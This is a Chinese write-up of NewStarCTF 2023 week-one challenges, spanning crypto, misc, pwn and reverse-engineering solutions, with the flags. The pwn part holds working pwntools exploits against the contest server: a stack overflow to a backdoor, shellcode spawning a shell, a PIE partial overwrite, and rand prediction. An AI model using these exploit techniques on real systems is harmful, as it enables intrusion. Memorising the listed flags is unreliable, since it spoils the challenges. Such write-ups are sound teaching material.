[NewStarCTF 2023 公开赛道] week1

最近没什么正式比赛，都是入门赛，有moectf,newstar,SHCTF,0xGame都是漫长的比赛。一周一堆制。

这周newstar第1周结束了，据说py得很厉害，第2周延期了，什么时候开始还不一定，不过第一周已经结束提交了，可以发上来存下。总体来说没难题。

 Crypto

brainfuck

++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++.

直接到网站解密 Brainfuck/OoK加密解密 - Bugku CTF

flag{Oiiaioooooiai#b7c0b1866fe58e12}

Caesar's Secert

kqfl{hf3x4w'x_h1umjw_n5_a4wd_3fed} 

随波逐流工具一键解密

 key1 #5: flag{ca3s4rs_c1pher_i5_v4ry_3azy}

Fence

 fa{ereigtepanet6680}lgrodrn_h_litx#8fc3

同样随波，W栅栏

flag{reordering_the_plaintext#686f8c03} 

Vigenère

 pqcq{qc_m1kt4_njn_5slp0b_lkyacx_gcdy1ud4_g3nv5x0}

试密钥，逐个字母试，使头为flag，也可以从 vigenere的表上查

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0} 

babyencoding

 flag由3段组成，第1段是base64,第2段是base32，第3段是uuencode

part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S

不过这个uuencode需要在 在线UUencode编码|在线UUencode解码|UU编码|UU解码|UUencode编码原理介绍--查错网 

上解码，随波上后部是乱码

flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}

babyrsa

n是由一堆小素数组成，可以直接分解

from Crypto.Util.number import *
from flag import flag
 
def gen_prime(n):
    res = 1
 
    for i in range(15):
        res *= getPrime(n)
 
    return res
 
 
if __name__ == '__main__':
    n = gen_prime(32)
    e = 65537
    m = bytes_to_long(flag)
    c = pow(m,e,n)
    print(n)
    print(c)
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595

在sage上直接得到phi

phi = euler_phi(n)
d = inverse_mod(0x10001, phi)
m = pow(c,d,n)
l2b(int(m))
b'flag{us4_s1ge_t0_cal_phI}'

Small d

d很小，直接用winer

from secret import flag
from Crypto.Util.number import *
 
p = getPrime(1024)
q = getPrime(1024)
 
d = getPrime(32)
e = inverse(d, (p-1)*(q-1))
n = p*q
m = bytes_to_long(flag)
 
c = pow(m,e,n)
 
print(c)
print(e)
print(n)
 
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433

#sage
from Crypto.Util.number import long_to_bytes,bytes_to_long
def transform(x,y):
    res = []
    while y:
        res.append(x//y)
        x,y = y,x%y
    return res
 
def continued_fraction(res):
    numerator,denominator = 1,0
    for i in res[::-1]:
        denominator,numerator = numerator,i*numerator+denominator
    return numerator,denominator
 
def wiener_attack(c,res,n):
    print("Attack start...")
    for i in range(1,len(res)):
        ress = res[:i]
        d = continued_fraction(ress)[1]
        m = long_to_bytes(int(pow(c,d,n)))
        #if all(0x20<=k<=0x7f for k in m):
        if b'flag{' in m:
            print(m)
            break
        
res = transform(e,n)
wiener_attack(c,res,n)
 
#Attack start...
#b'flag{learn_some_continued_fraction_technique#dc16885c}'

babyxor

1字节异或加密，直接爆破

from secret import *
 
ciphertext = []
 
for f in flag:
    ciphertext.append(f ^ key)
 
print(bytes(ciphertext).hex())
# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2

enc = bytes.fromhex('e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2')
for i in range(256):
    tmp = bytes([i^v for v in enc])
    if b'flag' in tmp:
        print(tmp)
 
#flag{x0r_15_symm3try_and_e4zy!!!!!!}

Affine

仿射密码

from flag import flag, key
 
modulus = 256
 
ciphertext = []
 
for f in flag:
    ciphertext.append((key[0]*f + key[1]) % modulus)
 
print(bytes(ciphertext).hex())
 
# dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064

因为两个key都很小，可以直接用flag{头爆破出来

enc = bytes.fromhex('dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
for i in range(256):
  for j in range(256):
    if bytes([(i*v+j)%256 for v in b'flag{']) == enc[:5]:
      print(i,j)
 
a,b = 17,23 
flag = ''
for i in range(len(enc)):
    for k in range(0x21,0x7f):
        if (a*k + b)%256 == enc[i]:
            flag += chr(k)
            break 
 
print(flag)
#flag{4ff1ne_c1pher_i5_very_3azy}

babyaes

from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *
 
def pad(data):
    return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])
 
def main():
    flag_ = pad(flag)
    key = os.urandom(16) * 2
    iv = os.urandom(16)
    print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
    aes = AES.new(key, AES.MODE_CBC, iv)
    enc_flag = aes.encrypt(flag_)
    print(enc_flag)
 
if __name__ == "__main__":
    main()

key有16*2字节，iv只有16字节，前部爆露，可以得到key和iv然后直接解密

hint = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
key = long_to_bytes(hint^1)[:16]*2
iv = long_to_bytes(hint^1^bytes_to_long(key))
 
aes = AES.new(key, AES.MODE_CBC, iv)
aes.decrypt(enc)
#b'firsT_cry_Aes\x00\x00\x00'
#flag{firsT_cry_Aes}

MISC

CyberChef's Secret

怀疑这是crypto过来的

M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=

直接叫厨子

 

机密图片

 一个图片是个二维码，显然不是flag，用StegSolver

流量！鲨鱼！ 

流量题，用wireshark打开，可以看到好多 http访问，接协议排序找到可疑项

追踪http流得到密文

Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=

上厨子，点魔术棒两次

压缩包们 

附件用010打开，发现是zip文件少头，改头为504b0304，后部有base64的提示

 解出提示是

I like six-digit numbers because they are very concise and easy to remember.

就是说6位数字密码，爆破6位数字，爆破报错，说明压缩包密码方式有误，用010修改下把0改为0

然后爆破密码，得到flag

 

空白格 

压缩包打开是个由空格和tab组成的空白文件，把空格换成0，tab换成1，每行只取后8字符（这里中间还都插着个1不知怎么出来的）

a = open('white.txt').readlines()
flag = ''
for v in a:
    v = v[:-1].replace(' ', '0').replace('\t', '1')
    flag += chr(int(v[-8:],2))
 
print(flag.replace(chr(1),''))

隐秘的眼睛

显然是提到眼睛就是silenteye

PWN

ret2text 

read有溢出，直接写后门

from pwn import *
 
p = remote('node4.buuoj.cn',29584)
context.log_level = 'debug'
 
p.sendlineafter(b"Show me your magic", b'\x00'*0x28 + p64(0x4011fb))
print(p.sendline(b'cat flag'))
p.interactive()

 ezshellcode

建了个可写可执行的块把shellcode读进去然后执行

from pwn import *
 
p = remote('node4.buuoj.cn',29612)
context(arch='amd64', log_level = 'debug')
 
p.sendlineafter(b"Show me your magic", asm(shellcraft.sh()))
print(p.sendline(b'cat flag'))
p.interactive()

 newstar shop

这题主要是看代码，

一共有100块，买gift花40两次，再运行3 减50变成负数，再买flag即可

输入：1，2，1，2，3，1，3

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-8h]
 
  v4 = __readfsqword(0x28u);
  init();
  while ( 1 )
  {
    menu();
    if ( (int)__isoc99_scanf("%d", &v3) <= 0 )
      puts("Invalid input");
    switch ( v3 )
    {
      case 1:
        shop();
        break;
      case 2:
        makemoney();
        break;
      case 3:
        dont_try();
        break;
      default:
        puts("nothing here");
        puts("\n");
        break;
    }
  }
}
unsigned __int64 shop()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]
 
  v2 = __readfsqword(0x28u);
  puts("=============================");
  puts("===Welcome to newstar shop===");
  puts("=============================");
  puts("1.newstar's gift          20$");
  puts("2.pwn write up            40$");
  puts("3.shell                 9999$");
  puts("\n");
  puts("All things are only available for one day!");
  puts("What do you want to buy?");
  puts("\n");
  if ( (int)__isoc99_scanf("%d", &v1) <= 0 )
    puts("Invalid input");
  if ( v1 != 3 )
  {
    if ( v1 > 3 )
    {
LABEL_17:
      puts("nothing here");
      puts("\n");
      return v2 - __readfsqword(0x28u);
    }
    if ( v1 == 1 )
    {
      if ( (unsigned int)money > 0x13 )
      {
        money -= 20;
        puts("You buy a newstar's gift");
        puts("That is the gift:");
        puts("What will happen when int transfer to unsigned int?");
        goto LABEL_10;
      }
    }
    else
    {
      if ( v1 != 2 )
        goto LABEL_17;
      if ( (unsigned int)money > 0x27 )
      {
        money -= 40;
        puts("You buy a pwn write up");
        puts("That is free after the match,haha");
        goto LABEL_10;
      }
    }
    puts("Sorry,you don't have enough money");
LABEL_10:
    puts("\n");
    return v2 - __readfsqword(0x28u);
  }
  if ( (unsigned int)money > 0x270E )
  {
    money = 0;
    puts("How do you buy it?");
    puts("\n");
    system("/bin/sh");
  }
  else
  {
    puts("Sorry,you don't have enough money");
    puts("\n");
  }
  return v2 - __readfsqword(0x28u);
}

p1eee

跟前边第1题类似，read有溢出还有后门，不过后门没直接给出

ssize_t sub_120E()
{
  __int64 buf[4]; // [rsp+0h] [rbp-20h] BYREF
 
  memset(buf, 0, sizeof(buf));
  puts("A nice try to break pie!!!");
  return read(0, buf, 0x29uLL);
}

后门

from pwn import *
 
p = remote('node4.buuoj.cn',25970)
context(arch='amd64', log_level = 'debug')
 
p.sendafter(b"A nice try to break pie!!!", b'\x00'*0x28 + p8(0x6c))
print(p.sendline(b'cat flag'))
p.interactive()

 Random

猜对一个数即可

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v3; // bl
  int v4; // eax
  int v6; // [rsp+4h] [rbp-2Ch] BYREF
  unsigned int seed; // [rsp+8h] [rbp-28h]
  int v8; // [rsp+Ch] [rbp-24h]
  _BYTE v9[5]; // [rsp+13h] [rbp-1Dh] BYREF
  unsigned __int64 v10; // [rsp+18h] [rbp-18h]
 
  v10 = __readfsqword(0x28u);
  init(argc, argv, envp);
  seed = time(0LL);
  srand(seed);
  v8 = rand();
  puts("can you guess the number?");
  __isoc99_scanf("%d", &v6);
  if ( v8 == v6 )
  {
    qmemcpy(v9, "2$031", sizeof(v9));
    v3 = v9[rand() % 5];
    v4 = rand();
    sy(v9[v4 % 2], v3);
  }
  else
  {
    printf("%s", "Haha you are wrong");
  }
  return 0;
}

用ctypes库猜一个数

from ctypes import *
from pwn import *
 
clibc = cdll.LoadLibrary("/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")
 
p = remote('node4.buuoj.cn',26584)
context(arch='amd64', log_level = 'debug')
 
 
clibc.srand(clibc.time(0))
v =clibc.rand()
 
p.sendlineafter(b"can you guess the number?", str(v).encode())
 
p.sendline(b'/bin/sh')
p.sendline(b'cat flag')
 
p.interactive()

REVERSE

easy_RE

IDA一打开就看到一半

再反编译又是一半

 咳

加密方法就是加1

>>> a = b'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
>>> bytes([v-1 for v in a])
b'flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}'

 Segments

根据题目名字查看段

ELF

 第二步是base64

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // edx
  char *s1; // [rsp+0h] [rbp-20h]
  char *v6; // [rsp+8h] [rbp-18h]
  char *s; // [rsp+10h] [rbp-10h]
 
  s = (char *)malloc(0x64uLL);
  printf("Input flag: ");
  fgets(s, 100, stdin);
  s[strcspn(s, "\n")] = 0;
  v6 = encode(s);
  v3 = strlen(v6);
  s1 = base64_encode((__int64)v6, v3);
  if ( !strcmp(s1, "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t") )
    puts("Correct");
  else
    puts("Wrong");
  free(v6);
  free(s1);
  free(s);
  return 0;
}

第1步encode是与0x20异或

_BYTE *__fastcall encode(const char *a1)
{
  size_t v1; // rax
  int v2; // eax
  _BYTE *v4; // [rsp+20h] [rbp-20h]
  int i; // [rsp+28h] [rbp-18h]
  int v6; // [rsp+2Ch] [rbp-14h]
 
  v1 = strlen(a1);
  v4 = malloc(2 * v1 + 1);
  v6 = 0;
  for ( i = 0; i < strlen(a1); ++i )
  {
    v2 = v6++;
    v4[v2] = (a1[i] ^ 0x20) + 16;
  }
  v4[v6] = 0;
  return v4;
}

a = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"
b = b64decode(a)
bytes([(v-16)^0x20 for v in b])
b'flag{D0_4ou_7now_wha7_ELF_1s?}'

Endian

这是大端小端的意思

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+4h] [rbp-3Ch]
  char *v5; // [rsp+8h] [rbp-38h]
  char v6[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+38h] [rbp-8h]
 
  v7 = __readfsqword(0x28u);
  puts("please input your flag");
  __isoc99_scanf("%s", v6);
  v5 = v6;
  for ( i = 0; i <= 4; ++i )
  {
    if ( *(_DWORD *)v5 != (array[i] ^ 0x12345678) )
    {
      printf("wrong!");
      exit(0);
    }
    v5 += 4;
  }
  printf("you are right");
  return 0;
}

加密只是作了个异或

>>> enc = [0x75553A1E, 0x7B583A03, 0x4D58220C, 0x7B50383D, 0x736B3819]
>>> a = [0x12345678 ^ v for v in enc]
>>>
>>> a
[1734437990, 1768713339, 1600943220, 1768189509, 1633644129]
>>> long_to_bytes(a[0])
b'galf'
>>> from pwn import p32
>>> b''.join(p32(v) for v in a)
b'flag{llittl_Endian_a'
>>>

AndroXor

用jadx打开，可以看到密文，key（异或）

public class MainActivity extends AppCompatActivity {
    private ActivityMainBinding binding;
 
    static {
        System.loadLibrary("androxor");
    }
 
    public String Xor(String str, String str2) {
        char[] cArr = {14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r'};
        char[] cArr2 = new char[str.length()];
        String str3 = str.length() != 25 ? "wrong!!!" : "you win!!!";
        for (int i = 0; i < str.length(); i++) {
            char charAt = (char) (str.charAt(i) ^ str2.charAt(i % str2.length()));
            cArr2[i] = charAt;
            if (cArr[i] != charAt) {
                return "wrong!!!";
            }
        }
        return str3;
    }
 
    /* JADX INFO: Access modifiers changed from: protected */
    @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater());
        this.binding = inflate;
        setContentView(inflate.getRoot());
        final EditText editText = (EditText) findViewById(R.id.password);
        ((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() { // from class: com.chick.androxor.MainActivity.1
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                String obj = editText.getText().toString();
                MainActivity mainActivity = MainActivity.this;
                Toast.makeText(mainActivity, mainActivity.Xor(obj, "happyx3"), 1).show();
                Log.d("输入", editText.getText().toString());
            }
        });
    }
}

c = [14,ord('\r'), 17, 23, 2, ord('K'), ord('I'), ord('7'), ord(' '), 30, 20, ord('I'), ord('\n'), 2, ord('\f'), ord('>'), ord('('), ord('@'), 11, ord('\''), ord('K'), ord('Y'), 25, ord('A'), ord('\r')]
key = b'happyx3'
 
xor(bytes(c),key)
#flag{3z_And0r1d_X0r_x1x1}

EzPE

又是下异或，这是第1个字符是序号和第2个异或

enc = bytes.fromhex('0A0C041F266C432D3C0C544C24251106053A7C51381A030D01361F122604685D3F2D372A7D')
flag = 'f'
for i in range(len(enc)):
    for k in range(0x20,0x7f):
        if ord(flag[i])^k^i == enc[i]:
            flag += chr(k)
            break 
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

 lazy_activtiy

又是个APK文件，从程序里看点击够10000就出flag

这里的editText就是flag

打开layout，找到用户定义的资源